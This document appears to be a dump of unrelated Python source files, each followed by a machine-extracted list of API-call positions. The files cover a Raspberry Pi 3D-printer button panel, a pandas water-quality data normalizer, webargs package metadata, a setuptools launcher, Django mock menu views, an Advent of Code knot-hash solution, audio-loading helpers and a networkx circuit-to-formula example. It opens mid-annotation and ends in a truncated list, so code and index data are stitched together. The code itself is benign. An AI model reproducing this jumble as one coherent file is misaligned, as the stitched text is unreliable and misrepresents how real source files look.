] | [((567, 654), 'django.contrib.auth.models.User.objects.create_user', 'User.objects.create_user', ([], {'username': '"""jacob"""', 'email': '"""jacob@…"""', 'password': '"""<PASSWORD>"""'}), "(username='jacob', email='jacob@…', password=\n '<PASSWORD>')\n", (591, 654), False, 'from django.contrib.auth.models import User\n'), ((689, 774), 'django.contrib.auth.models.User.objects.create_user', 'User.objects.create_user', ([], {'username': '"""fred"""', 'email': '"""fred@…"""', 'password': '"""<PASSWORD>"""'}), "(username='fred', email='fred@…', password='<PASSWORD>'\n )\n", (713, 774), False, 'from django.contrib.auth.models import User\n'), ((835, 937), 'cms.api.create_page', 'create_page', ([], {'title': '"""test_page"""', 'reverse_id': '"""testpage"""', 'template': '"""test.html"""', 'language': '"""en"""'}), "(title='test_page', reverse_id='testpage', template='test.html',\n language='en', **data)\n", (846, 937), False, 'from cms.api import assign_user_to_page, create_page\n'), ((2109, 2160), 'cms.api.assign_user_to_page', 'assign_user_to_page', (['page', 'self.user'], {'can_view': '(True)'}), '(page, self.user, can_view=True)\n', (2128, 2160), False, 'from cms.api import assign_user_to_page, create_page\n'), ((2427, 2484), 'cms.api.assign_user_to_page', 'assign_user_to_page', (['page', 'self.other_user'], {'can_view': '(True)'}), '(page, self.other_user, can_view=True)\n', (2446, 2484), False, 'from cms.api import assign_user_to_page, create_page\n'), ((3196, 3247), 'cms.api.assign_user_to_page', 'assign_user_to_page', (['page', 'self.user'], {'can_view': '(True)'}), '(page, self.user, can_view=True)\n', (3215, 3247), False, 'from cms.api import assign_user_to_page, create_page\n'), ((3517, 3574), 'cms.api.assign_user_to_page', 'assign_user_to_page', (['page', 'self.other_user'], {'can_view': '(True)'}), '(page, self.other_user, can_view=True)\n', (3536, 3574), False, 'from cms.api import assign_user_to_page, create_page\n')] |
# -*-coding:Utf-8 -*
"""Raspberry Pi front panel for a Repetier-controlled 3D printer ('HD').

Binds GPIO button actions to gcode files and keeps the UI alive until
interrupted.  The printer is powered on through an IFTTT webhook.
"""
from repetier_ui import *
import time
import set_ifttt
from FUTIL.my_logging import *

my_logging(console_level = DEBUG, logfile_level = INFO)

# Printer handle bound to the Repetier server API.
HD = repetier_printer (repetier_api(api_key='<KEY>'),'HD')

# IFTTT webhook key is stored outside the repo at /home/pi/iftt_key.py.
sys.path.insert(0,'/home/pi')
import iftt_key
ifttt0 = set_ifttt.ifttt(iftt_key.key)

def wake_up():
    # Power the printer on via the IFTTT 'HD_on' event.
    ifttt0.send_cmd("HD_on")

UI = repetier_ui(debug=False, wake_up = wake_up ) #debug = True : do not actually send the gcode
# GPIO pin -> gcode action bindings.
UI.add_action(22,repetier_file_action("extract.gcode",HD))
UI.add_action(27,repetier_file_action("extrude_100_vite.gcode",HD))
UI.add_action(17,repetier_file_action("extrude_50.gcode",HD))
UI.add_action(10,repetier_file_action("goto_z_max.gcode",HD, only_if_has_axis = True))
UI.add_action(19,repetier_file_action("stop_all.gcode",HD))
UI.add_action(18,repetier_file_action("pause.gcode", HD, only_if_printing = True)) # Filament presence detection
# Pin 26 toggles pause/resume on successive presses.
UI.add_successive_actions(26,repetier_file_action("pause.gcode",HD), repetier_action_action("continueJob",HD))

# Idle loop: the UI runs on callbacks; sleep until Ctrl-C, then clean up.
try:
    while True:
        time.sleep(10)
except KeyboardInterrupt:
    print('interrupted!')
finally:
    UI.close()
| [
"time.sleep",
"set_ifttt.ifttt"
] | [((283, 312), 'set_ifttt.ifttt', 'set_ifttt.ifttt', (['iftt_key.key'], {}), '(iftt_key.key)\n', (298, 312), False, 'import set_ifttt\n'), ((1036, 1050), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (1046, 1050), False, 'import time\n')] |
import pandas as pd
class Normalizer:
    """Load the water-potability CSV, impute missing values, and split the
    rows into potable / unpotable subsets.

    Attributes
    ----------
    dataset : pandas.DataFrame
        Full dataset with all columns numeric and no NaNs in the imputed
        columns.
    dataset_potable, dataset_unpotable : pandas.DataFrame
        Rows with ``Potability`` == 1 / == 0, each with a fresh index.
    """

    csv_data = 'dataset/water_potability.csv'  # file from work data

    # Columns known to contain missing values in the source CSV.
    _IMPUTED_COLUMNS = ('ph', 'Sulfate', 'Trihalomethanes')

    def __init__(self) -> None:
        self.dataset = pd.read_csv(self.csv_data)
        self.__normalize_data__()
        self.__separate__()

    # NOTE(review): the __dunder__ method names are kept for backward
    # compatibility, but double-underscore-wrapped names are reserved by
    # convention for the language; plain _single_underscore names would be
    # preferable.
    def __normalize_data__(self) -> None:
        """Coerce every column to numeric and fill NaNs with the mean of
        the row's Potability class (so imputation does not leak across
        classes)."""
        self.dataset = self.dataset.apply(pd.to_numeric)
        # Identical imputation for each gappy column; the original
        # repeated this line three times.
        for column in self._IMPUTED_COLUMNS:
            class_mean = (self.dataset.groupby('Potability')[column]
                          .transform('mean'))
            self.dataset[column] = self.dataset[column].fillna(class_mean)

    def __separate__(self) -> None:
        """Split the dataset into potable (Potability == 1) and unpotable
        (Potability == 0) frames, each re-indexed from zero."""
        self.dataset_potable = (
            self.dataset.loc[self.dataset['Potability'] == 1].reset_index())
        self.dataset_unpotable = (
            self.dataset.loc[self.dataset['Potability'] == 0].reset_index())
# Smoke test: running the module directly loads and normalizes the dataset.
if __name__ == '__main__':
    normalizer = Normalizer()
"pandas.read_csv"
] | [((156, 182), 'pandas.read_csv', 'pd.read_csv', (['self.csv_data'], {}), '(self.csv_data)\n', (167, 182), True, 'import pandas as pd\n')] |
# -*- coding: utf-8 -*-
"""Top-level webargs package: re-exports the public API and package metadata."""
from distutils.version import LooseVersion
from marshmallow.utils import missing

# Make marshmallow's validation functions importable from webargs
from marshmallow import validate

from webargs.core import dict2schema, ValidationError
from webargs import fields

__version__ = "5.3.2"
# Parsed version as a tuple of ints/strings, e.g. (5, 3, 2).
__version_info__ = tuple(LooseVersion(__version__).version)
__author__ = "<NAME>"
__license__ = "MIT"
# Explicit public API of the package.
__all__ = ("dict2schema", "ValidationError", "fields", "missing", "validate")
| [
"distutils.version.LooseVersion"
] | [((335, 360), 'distutils.version.LooseVersion', 'LooseVersion', (['__version__'], {}), '(__version__)\n', (347, 360), False, 'from distutils.version import LooseVersion\n')] |
#!C:\Users\stpny\Downloads\grasp_public-master\grasp_public-master\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'imageio==2.5.0','console_scripts','imageio_remove_bin'
# Auto-generated setuptools console-script wrapper: resolves the
# 'imageio_remove_bin' entry point from the imageio 2.5.0 distribution and
# executes it.  Do not edit by hand; regenerated on package (re)install.
__requires__ = 'imageio==2.5.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
    # Strip the '-script.py'/'.exe' suffix so sys.argv[0] matches the
    # command name the user invoked (Windows launcher convention).
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('imageio==2.5.0', 'console_scripts', 'imageio_remove_bin')()
    )
| [
"re.sub",
"pkg_resources.load_entry_point"
] | [((321, 373), 're.sub', 're.sub', (['"""(-script\\\\.pyw?|\\\\.exe)?$"""', '""""""', 'sys.argv[0]'], {}), "('(-script\\\\.pyw?|\\\\.exe)?$', '', sys.argv[0])\n", (327, 373), False, 'import re\n'), ((397, 472), 'pkg_resources.load_entry_point', 'load_entry_point', (['"""imageio==2.5.0"""', '"""console_scripts"""', '"""imageio_remove_bin"""'], {}), "('imageio==2.5.0', 'console_scripts', 'imageio_remove_bin')\n", (413, 472), False, 'from pkg_resources import load_entry_point\n')] |
import logging
import sys
from .pipeline import MWFPipeline
def build(config):
    """Build a dictionary from a pipeline configuration.

    Parameters
    ----------
    config : dict
        Mapping with ``source``, ``tweaks``, ``converter`` and ``generator``
        sections (each may be ``None``).  ``source`` must provide at least
        one of ``api_path`` or ``file_path``.

    Returns
    -------
    The dictionary produced by the configured generators.

    Exits
    -----
    Calls ``sys.exit(1)`` when neither ``api_path`` nor ``file_path``
    is configured.

    Bug fixed: the original only checked ``file_path is None`` *inside* the
    branch taken when ``file_path`` was not None, so the "no source" error
    was unreachable and a sourceless config proceeded silently.
    """
    config["source"] = config["source"] or {}
    config["tweaks"] = config["tweaks"] or []
    config["converter"] = config["converter"] or {}
    config["generator"] = config["generator"] or []

    source = config["source"]
    api_path = source.get("api_path")
    title_file_path = source.get("file_path")
    if api_path is None and title_file_path is None:
        logging.error("No api_path or file_path provided. Stop.")
        sys.exit(1)
    # Missing kwargs now defaults to no extra arguments instead of raising
    # TypeError on the ** expansion.
    source_kwargs = source.get("kwargs") or {}

    pipeline = MWFPipeline(api_path)
    if api_path is not None:
        pipeline.fetch_titles(**source_kwargs)
    if title_file_path is not None:
        # Accept a single path or a list of paths.
        if isinstance(title_file_path, str):
            title_file_path = [title_file_path]
        for path in title_file_path:
            pipeline.load_titles_from_file(path, **source_kwargs)

    pipeline.convert_to_words(config["tweaks"])
    pipeline.export_words(config["converter"].get("use"),
                          **(config["converter"].get("kwargs") or {}))

    generators = config["generator"]
    if not isinstance(generators, list):
        generators = [generators]
    for gen in generators:
        pipeline.generate_dict(gen.get("use"), **(gen.get("kwargs") or {}))
    return pipeline.dict
| [
"logging.error",
"sys.exit"
] | [((618, 675), 'logging.error', 'logging.error', (['"""No api_path or file_path provided. Stop."""'], {}), "('No api_path or file_path provided. Stop.')\n", (631, 675), False, 'import logging\n'), ((688, 699), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (696, 699), False, 'import sys\n')] |
from django.shortcuts import render
from django.http import HttpResponse
import json
# Create your views here.
def info(request):
    """Mock API view returning the current user's role and permissions as JSON.

    Dead code removed: the original first built a large user-profile
    ``userInfo`` dict that was unconditionally reassigned before use, and
    ``roleObj`` contained three duplicate ``'permissions'`` keys of which
    only the last survived (Python dict literals keep the last value at the
    first key's position).  Only the effective data is kept here, with the
    same key order, so the serialized response is unchanged.
    """
    roleObj = {
        # 'permissions' stays first to preserve the original key order
        # (and therefore the exact JSON output).
        'permissions': [{
            'roleId': 'admin',
            'permissionId': 'support',
            'permissionName': '超级模块',
            'actions': '[{"action":"add","defaultCheck":false,"describe":"新增"},{"action":"import","defaultCheck":false,"describe":"导入"},{"action":"get","defaultCheck":false,"describe":"详情"},{"action":"update","defaultCheck":false,"describe":"修改"},{"action":"delete","defaultCheck":false,"describe":"删除"},{"action":"export","defaultCheck":false,"describe":"导出"}]',
            'actionEntitySet': [{
                'action': 'add',
                'describe': '新增',
                'defaultCheck': False
            }, {
                'action': 'import',
                'describe': '导入',
                'defaultCheck': False
            }, {
                'action': 'get',
                'describe': '详情',
                'defaultCheck': False
            }, {
                'action': 'update',
                'describe': '修改',
                'defaultCheck': False
            }, {
                'action': 'delete',
                'describe': '删除',
                'defaultCheck': False
            }, {
                'action': 'export',
                'describe': '导出',
                'defaultCheck': False
            }],
            'actionList': None,
            'dataAccess': None
        }, {
            'roleId': 'admin',
            'permissionId': 'pioverview',
            'permissionName': 'pioverview',
            'actions': '[{"action":"add","defaultCheck":false,"describe":"新增"},{"action":"query","defaultCheck":false,"describe":"查询"},{"action":"get","defaultCheck":false,"describe":"详情"},{"action":"update","defaultCheck":false,"describe":"修改"},{"action":"delete","defaultCheck":false,"describe":"删除"}]',
            'actionEntitySet': [{
                'action': 'add',
                'describe': '新增',
                'defaultCheck': False
            }, {
                'action': 'query',
                'describe': '查询',
                'defaultCheck': False
            }, {
                'action': 'get',
                'describe': '详情',
                'defaultCheck': False
            }, {
                'action': 'update',
                'describe': '修改',
                'defaultCheck': False
            }, {
                'action': 'delete',
                'describe': '删除',
                'defaultCheck': False
            }],
            'actionList': None,
            'dataAccess': None
        }],
        'id': 'admin',
        'name': '管理员',
        'describe': '拥有所有权限',
        'status': 1,
        'creatorId': 'system',
        'createTime': 1497160610259,
        'deleted': 0,
    }
    userInfo = {
        'result': {
            'role': roleObj
        }
    }
    return HttpResponse(json.dumps(userInfo, indent=4))
def nav(request):
    """Return the frontend navigation menu tree as JSON.

    Each entry is a flat record linked by ``id``/``parentId`` (``-1`` marks a
    top-level item); the frontend reassembles the tree from these links.
    ``meta`` carries icon/title/visibility hints and ``component`` names the
    frontend view to render.
    """
    # NOTE(review): some ``id`` values are reused across branches (e.g. 6, 7,
    # and 10034 each appear twice) — confirm the frontend keys on
    # (parentId, id) or deduplicate.
    nav = [
        # // dashboard
        {
            'name': 'dashboard',
            'parentId': -1,
            'id': 1,
            'meta': {
                'icon': 'dashboard',
                'title': '仪表盘',
                'show': True
            },
            'component': 'RouteView',
            'redirect': '/dashboard/workplace'
        },
        {
            'name': 'workplace',
            'parentId': 1,
            'id': 7,
            'meta': {
                'title': '工作台',
                'show': True
            },
            'component': 'Workplace'
        },
        {
            'name': 'monitor',
            'path': 'https://www.baidu.com/',
            'parentId': 1,
            'id': 3,
            'meta': {
                'title': '监控页(外部)',
                'target': '_blank',
                'show': True
            }
        },
        {
            'name': 'analysis',
            'parentId': 1,
            'id': 2,
            'meta': {
                'title': '分析页',
                'show': True
            },
            'component': 'Analysis'
        },
        {
            'name': 'tests',
            'parentId': 1,
            'id': 8,
            'meta': {
                'title': '测试功能',
                'show': True
            },
            'component': 'TestWork'
        },
        # //pi overview
        {
            'name': 'pioverview',
            'parentId': -1,
            'id': 100,
            'meta': {
                'icon': 'dashboard',
                'title': 'Pi Overview',
                'show': True
            },
            'component': 'RouteView',
            'redirect': '/pioverview/gpioOverview'
        },
        {
            'name': 'gpioOverview',
            'parentId': 100,
            'id': 6,
            'meta': {
                'title': 'GPIO Overview'
            },
            'component': 'PiGPIOStatus'
        },
        {
            'name': 'workingOverview',
            'parentId': 100,
            'id': 7,
            'meta': {
                # NOTE(review): 'Woring' looks like a typo for 'Working' —
                # this is a runtime string, confirm with frontend before fixing.
                'title': 'Woring Overview'
            },
            'component': 'PiWorkingStatus'
        },
        # // form
        {
            'name': 'form',
            'parentId': -1,
            'id': 10,
            'meta': {
                'icon': 'form',
                'title': '表单页'
            },
            'redirect': '/form/base-form',
            'component': 'PageView'
        },
        {
            'name': 'basic-form',
            'parentId': 10,
            'id': 6,
            'meta': {
                'title': '基础表单'
            },
            'component': 'BasicForm'
        },
        {
            'name': 'step-form',
            'parentId': 10,
            'id': 5,
            'meta': {
                'title': '分步表单'
            },
            'component': 'StepForm'
        },
        {
            'name': 'advanced-form',
            'parentId': 10,
            'id': 4,
            'meta': {
                'title': '高级表单'
            },
            'component': 'AdvanceForm'
        },
        # // list
        {
            'name': 'list',
            'parentId': -1,
            'id': 10010,
            'meta': {
                'icon': 'table',
                'title': '列表页',
                'show': True
            },
            'redirect': '/list/table-list',
            'component': 'PageView'
        },
        {
            'name': 'table-list',
            'parentId': 10010,
            'id': 10011,
            'path': '/list/table-list/:pageNo([1-9]\\d*)?',
            'meta': {
                'title': '查询表格',
                'show': True
            },
            'component': 'TableList'
        },
        {
            'name': 'basic-list',
            'parentId': 10010,
            'id': 10012,
            'meta': {
                'title': '标准列表',
                'show': True
            },
            'component': 'StandardList'
        },
        {
            'name': 'card',
            'parentId': 10010,
            'id': 10013,
            'meta': {
                'title': '卡片列表',
                'show': True
            },
            'component': 'CardList'
        },
        {
            'name': 'search',
            'parentId': 10010,
            'id': 10014,
            'meta': {
                'title': '搜索列表',
                'show': True
            },
            'redirect': '/list/search/article',
            'component': 'SearchLayout'
        },
        {
            'name': 'article',
            'parentId': 10014,
            'id': 10015,
            'meta': {
                'title': '搜索列表(文章)',
                'show': True
            },
            'component': 'SearchArticles'
        },
        {
            'name': 'project',
            'parentId': 10014,
            'id': 10016,
            'meta': {
                'title': '搜索列表(项目)',
                'show': True
            },
            'component': 'SearchProjects'
        },
        {
            'name': 'application',
            'parentId': 10014,
            'id': 10017,
            'meta': {
                'title': '搜索列表(应用)',
                'show': True
            },
            'component': 'SearchApplications'
        },
        # // profile
        {
            'name': 'profile',
            'parentId': -1,
            'id': 10018,
            'meta': {
                'title': '详情页',
                'icon': 'profile',
                'show': True
            },
            'redirect': '/profile/basic',
            'component': 'RouteView'
        },
        {
            'name': 'basic',
            'parentId': 10018,
            'id': 10019,
            'meta': {
                'title': '基础详情页',
                'show': True
            },
            'component': 'ProfileBasic'
        },
        {
            'name': 'advanced',
            'parentId': 10018,
            'id': 10020,
            'meta': {
                'title': '高级详情页',
                'show': True
            },
            'component': 'ProfileAdvanced'
        },
        # // result
        {
            'name': 'result',
            'parentId': -1,
            'id': 10021,
            'meta': {
                'title': '结果页',
                'icon': 'check-circle-o',
                'show': True
            },
            'redirect': '/result/success',
            'component': 'PageView'
        },
        {
            'name': 'success',
            'parentId': 10021,
            'id': 10022,
            'meta': {
                'title': '成功',
                'hiddenHeaderContent': True,
                'show': True
            },
            'component': 'ResultSuccess'
        },
        {
            'name': 'fail',
            'parentId': 10021,
            'id': 10023,
            'meta': {
                'title': '失败',
                'hiddenHeaderContent': True,
                'show': True
            },
            'component': 'ResultFail'
        },
        # // Exception
        {
            'name': 'exception',
            'parentId': -1,
            'id': 10024,
            'meta': {
                'title': '异常页',
                'icon': 'warning',
                'show': True
            },
            'redirect': '/exception/403',
            'component': 'RouteView'
        },
        {
            'name': '403',
            'parentId': 10024,
            'id': 10025,
            'meta': {
                'title': '403',
                'show': True
            },
            'component': 'Exception403'
        },
        {
            'name': '404',
            'parentId': 10024,
            'id': 10026,
            'meta': {
                'title': '404',
                'show': True
            },
            'component': 'Exception404'
        },
        {
            'name': '500',
            'parentId': 10024,
            'id': 10027,
            'meta': {
                'title': '500',
                'show': True
            },
            'component': 'Exception500'
        },
        # // account
        {
            'name': 'account',
            'parentId': -1,
            'id': 10028,
            'meta': {
                'title': '个人页',
                'icon': 'user',
                'show': True
            },
            'redirect': '/account/center',
            'component': 'RouteView'
        },
        {
            'name': 'center',
            'parentId': 10028,
            'id': 10029,
            'meta': {
                'title': '个人中心',
                'show': True
            },
            'component': 'AccountCenter'
        },
        # // special three-level menu (children hidden from the sidebar)
        {
            'name': 'settings',
            'parentId': 10028,
            'id': 10030,
            'meta': {
                'title': '个人设置',
                'hideHeader': True,
                'hideChildren': True,
                'show': True
            },
            'redirect': '/account/settings/base',
            'component': 'AccountSettings'
        },
        {
            'name': 'BaseSettings',
            'path': '/account/settings/base',
            'parentId': 10030,
            'id': 10031,
            'meta': {
                'title': '基本设置',
                'show': False
            },
            'component': 'BaseSettings'
        },
        {
            'name': 'SecuritySettings',
            'path': '/account/settings/security',
            'parentId': 10030,
            'id': 10032,
            'meta': {
                'title': '安全设置',
                'show': False
            },
            'component': 'SecuritySettings'
        },
        {
            'name': 'CustomSettings',
            'path': '/account/settings/custom',
            'parentId': 10030,
            'id': 10033,
            'meta': {
                'title': '个性化设置',
                'show': False
            },
            'component': 'CustomSettings'
        },
        {
            'name': 'BindingSettings',
            'path': '/account/settings/binding',
            'parentId': 10030,
            'id': 10034,
            'meta': {
                'title': '账户绑定',
                'show': False
            },
            'component': 'BindingSettings'
        },
        {
            'name': 'NotificationSettings',
            'path': '/account/settings/notification',
            'parentId': 10030,
            'id': 10034,
            'meta': {
                'title': '新消息通知',
                'show': False
            },
            'component': 'NotificationSettings'
        }
    ]
    navResult = {
        'result': nav
    }
    return HttpResponse(json.dumps(navResult, indent=4))
| [
"json.dumps"
] | [((13030, 13060), 'json.dumps', 'json.dumps', (['userInfo'], {'indent': '(4)'}), '(userInfo, indent=4)\n', (13040, 13060), False, 'import json\n'), ((21313, 21344), 'json.dumps', 'json.dumps', (['navResult'], {'indent': '(4)'}), '(navResult, indent=4)\n', (21323, 21344), False, 'import json\n')] |
#%%
# read full assignment
# think algo before implementing
# dont use a dict when you need a list
# assignment is still = and not ==
# dont use itertools when you can use np.roll
# check mathemathical functions if the parentheses are ok
# networkx is awesome
# sometimes while true is better than just too small for loop
# networkx addes nodes when adding edge to nonexistent node
# %%
import os
import re
import numpy as np
# Best-effort: when run from the repo root, move into the puzzle directory so
# relative input paths resolve; silently stay put otherwise (e.g. in a notebook
# already inside 'day 14').
try:
    os.chdir(os.path.join(os.getcwd(), 'day 14'))
    print(os.getcwd())
except:
    pass
from functools import reduce
import operator
import networkx as nx
import numpy as np
# f = open('input.txt','r').read().strip()
def gethash(f):
    """Compute the Knot Hash (Advent of Code 2017, day 10) of string *f*.

    Returns the 32-character hex digest: 64 rounds of pinch-and-twist over a
    256-element ring, then 16 blocks of 16 values XOR-folded into bytes.
    """
    lengths = [ord(ch) for ch in f] + [17, 31, 73, 47, 23]
    ring = np.arange(256)
    skip = 0
    start = 0
    for _ in range(64):
        for length in lengths:
            # Rotate the pinch to the front, reverse it in place, rotate back.
            ring = np.roll(ring, -start)
            ring[:length] = ring[:length][::-1]
            ring = np.roll(ring, start)
            start = (start + length + skip) % len(ring)
            skip += 1
    hashcode = ''
    for block in range(16):
        chunk = ring[block * 16:block * 16 + 16]
        folded = reduce(operator.xor, chunk)
        hashcode += hex(folded)[2:].zfill(2)
    return hashcode
def getbits(inp):
    """Return the binary expansion of hex string *inp*, zero-padded to >= 4 bits."""
    value = int(inp, 16)
    # format(..., 'b') drops the '0b' prefix; zfill pads short nibbles.
    return format(value, 'b').zfill(4)
# Part 1: count the '1' bits over all 128 knot-hash rows for this puzzle input.
count= 0
f = 'stpzcrnm'
for r in range(128):
    h = gethash('stpzcrnm-'+str(r))
    # Expand the hex digest to a 128-bit row; stripping '0's leaves only set bits.
    count+=len(''.join([getbits(b) for b in h]).replace('0',''))
count
# %%
# Part 2: rebuild the 128x128 bit grid, keeping each row for region counting.
count= 0
grid = []
f = 'stpzcrnm'
for r in range(128):
    h = gethash('stpzcrnm-'+str(r))
    grid.append(list(''.join([getbits(b) for b in h])))
    count+=len(''.join([getbits(b) for b in h]).replace('0',''))
# %%
grid = np.array(grid)
print(grid.shape)
# Build a graph with an edge from every '1' cell to its 4-neighbours …
G = nx.Graph()
for index,output in np.ndenumerate(grid):
    if output == '1':
        i,j = index[0], index[1]
        G.add_edge((i,j),(i+1,j))
        G.add_edge((i,j),(i-1,j))
        G.add_edge((i,j),(i,j+1))
        G.add_edge((i,j),(i,j-1))
# … then drop the '0' cells that those edges implicitly created
# (networkx adds missing endpoints when an edge is added).
for index,output in np.ndenumerate(grid):
    if output == '0':
        if G.has_node(index): G.remove_node(index)
# Number of connected components == number of used regions (part 2 answer).
nx.number_connected_components(G)
# %%
| [
"numpy.roll",
"networkx.Graph",
"numpy.ndenumerate",
"os.getcwd",
"numpy.array",
"networkx.number_connected_components",
"operator.xor",
"numpy.arange"
] | [((1816, 1830), 'numpy.array', 'np.array', (['grid'], {}), '(grid)\n', (1824, 1830), True, 'import numpy as np\n'), ((1853, 1863), 'networkx.Graph', 'nx.Graph', ([], {}), '()\n', (1861, 1863), True, 'import networkx as nx\n'), ((1885, 1905), 'numpy.ndenumerate', 'np.ndenumerate', (['grid'], {}), '(grid)\n', (1899, 1905), True, 'import numpy as np\n'), ((2119, 2139), 'numpy.ndenumerate', 'np.ndenumerate', (['grid'], {}), '(grid)\n', (2133, 2139), True, 'import numpy as np\n'), ((2215, 2248), 'networkx.number_connected_components', 'nx.number_connected_components', (['G'], {}), '(G)\n', (2245, 2248), True, 'import networkx as nx\n'), ((746, 760), 'numpy.arange', 'np.arange', (['(256)'], {}), '(256)\n', (755, 760), True, 'import numpy as np\n'), ((486, 497), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (495, 497), False, 'import os\n'), ((455, 466), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (464, 466), False, 'import os\n'), ((861, 886), 'numpy.roll', 'np.roll', (['circular', '(-start)'], {}), '(circular, -start)\n', (868, 886), True, 'import numpy as np\n'), ((953, 978), 'numpy.roll', 'np.roll', (['circular', '(+start)'], {}), '(circular, +start)\n', (960, 978), True, 'import numpy as np\n'), ((1112, 1130), 'operator.xor', 'operator.xor', (['a', 'b'], {}), '(a, b)\n', (1124, 1130), False, 'import operator\n')] |
import numpy as np
from scipy.io.wavfile import read
import torch
def get_mask_from_lengths(lengths):
    """Build a padding mask from a batch of sequence lengths.

    Args:
        lengths: 1-D integer tensor of per-sequence lengths, shape (batch,).

    Returns:
        uint8 tensor of shape (batch, max_len) where entry (b, t) is 1
        iff t < lengths[b].
    """
    max_len = torch.max(lengths).item()
    # Allocate the position ids on the same device as `lengths`.  The previous
    # code chose CUDA whenever torch.cuda.is_available(), which crashes when
    # comparing CUDA `ids` against a CPU `lengths` tensor.
    ids = torch.arange(0, max_len, dtype=torch.long, device=lengths.device)
    mask = (ids < lengths.unsqueeze(1)).byte()
    return mask
def load_wav_to_torch(full_path):
    """Read a WAV file and return (float32 FloatTensor of samples, sampling rate)."""
    sampling_rate, samples = read(full_path)
    audio = torch.FloatTensor(samples.astype(np.float32))
    return audio, sampling_rate
def load_dataset(filename, separator="|"):
    """Parse a UTF-8 metadata file into a list of per-line field lists.

    Each line is stripped and split on *separator*.
    """
    rows = []
    with open(filename, encoding='utf-8') as handle:
        for raw_line in handle:
            rows.append(raw_line.strip().split(separator))
    return rows
def to_gpu(x):
    """Make *x* contiguous, move it to the GPU when available, and wrap it.

    The torch.autograd.Variable wrapper mirrors the original API; on modern
    PyTorch it simply returns a Tensor.
    """
    out = x.contiguous()
    if torch.cuda.is_available():
        out = out.cuda(non_blocking=True)
    return torch.autograd.Variable(out)
| [
"torch.cuda.LongTensor",
"torch.LongTensor",
"torch.max",
"torch.cuda.is_available",
"scipy.io.wavfile.read",
"torch.autograd.Variable"
] | [((151, 176), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (174, 176), False, 'import torch\n'), ((458, 473), 'scipy.io.wavfile.read', 'read', (['full_path'], {}), '(full_path)\n', (462, 473), False, 'from scipy.io.wavfile import read\n'), ((767, 792), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (790, 792), False, 'import torch\n'), ((843, 869), 'torch.autograd.Variable', 'torch.autograd.Variable', (['x'], {}), '(x)\n', (866, 869), False, 'import torch\n'), ((118, 136), 'torch.max', 'torch.max', (['lengths'], {}), '(lengths)\n', (127, 136), False, 'import torch\n'), ((221, 251), 'torch.cuda.LongTensor', 'torch.cuda.LongTensor', (['max_len'], {}), '(max_len)\n', (242, 251), False, 'import torch\n'), ((306, 331), 'torch.LongTensor', 'torch.LongTensor', (['max_len'], {}), '(max_len)\n', (322, 331), False, 'import torch\n')] |
#!/usr/bin/env python
# circuits.py - convert a Boolean circuit to an equivalent Boolean formula
#
# Copyright 2016 <NAME> <<EMAIL>>.
#
# This file is part of NetworkX.
#
# NetworkX is distributed under a BSD license; see LICENSE.txt for more
# information.
"""
========
Circuits
========
Convert a Boolean circuit to an equivalent Boolean formula.
A Boolean circuit can be exponentially more expressive than an
equivalent formula in the worst case, since the circuit can reuse
subcircuits multiple times, whereas a formula cannot reuse subformulas
more than once. Thus creating a Boolean formula from a Boolean circuit
in this way may be infeasible if the circuit is large.
"""
from networkx import dag_to_branching
from networkx import DiGraph
from networkx.utils import arbitrary_element
def circuit_to_formula(circuit):
    """Convert a Boolean circuit (a DAG) into an equivalent Boolean formula.

    The formula is the branching produced by ``dag_to_branching``; each
    formula node carries the ``label`` of the circuit node it was copied from.
    """
    # Convert the circuit to an equivalent formula.
    formula = dag_to_branching(circuit)
    # Transfer the operator or variable labels for each node from the
    # circuit to the formula.  ``G.nodes[v]`` is the modern accessor; the
    # legacy ``G.node`` attribute was removed in NetworkX 2.4.
    for v in formula:
        source = formula.nodes[v]['source']
        formula.nodes[v]['label'] = circuit.nodes[source]['label']
    return formula
def formula_to_string(formula):
    """Render a formula branching (from ``circuit_to_formula``) as a string.

    Variable nodes print as their label, unary nodes as ``label(child)``,
    and binary nodes as ``(left label right)``.
    """
    def _to_string(formula, root):
        # If there are no children, this is a variable node.
        # ``formula.nodes[root]`` replaces the legacy ``formula.node[root]``
        # accessor removed in NetworkX 2.4.
        label = formula.nodes[root]['label']
        if not formula[root]:
            return label
        # Otherwise, this is an operator.
        children = formula[root]
        # If one child, the label must be a NOT operator.
        if len(children) == 1:
            child = arbitrary_element(children)
            return '{}({})'.format(label, _to_string(formula, child))
        # NB "left" and "right" here are a little misleading: there is
        # no order on the children of a node. That's okay because the
        # Boolean AND and OR operators are symmetric. It just means that
        # the order of the operands cannot be predicted and hence the
        # function does not necessarily behave the same way on every
        # invocation.
        left, right = formula[root]
        left_subformula = _to_string(formula, left)
        right_subformula = _to_string(formula, right)
        return '({} {} {})'.format(left_subformula, label, right_subformula)

    root = next(v for v, d in formula.in_degree() if d == 0)
    return _to_string(formula, root)
def main():
    """Build the example circuit, convert it to a formula, and print it.

    The circuit has a ∧ at the output and two ∨s at the next layer.  The
    third layer has a variable x appearing in the left ∨, a variable y
    appearing in both ∨s, and a negation of the variable z, which sits alone
    in the fourth layer.
    """
    circuit = DiGraph()
    # Label every gate/variable node (insertion order matches the original
    # layer-by-layer construction), then wire the layers together.
    labels = {0: '∧', 1: '∨', 2: '∨', 3: 'x', 4: 'y', 5: '¬', 6: 'z'}
    for node, label in labels.items():
        circuit.add_node(node, label=label)
    circuit.add_edges_from([(0, 1), (0, 2), (1, 3), (1, 4), (2, 4), (2, 5), (5, 6)])
    # Convert the circuit to an equivalent formula and show it.
    print(formula_to_string(circuit_to_formula(circuit)))
# Run the demonstration only when executed as a script, not on import.
if __name__ == '__main__':
    main()
| [
"networkx.utils.arbitrary_element",
"networkx.DiGraph",
"networkx.dag_to_branching"
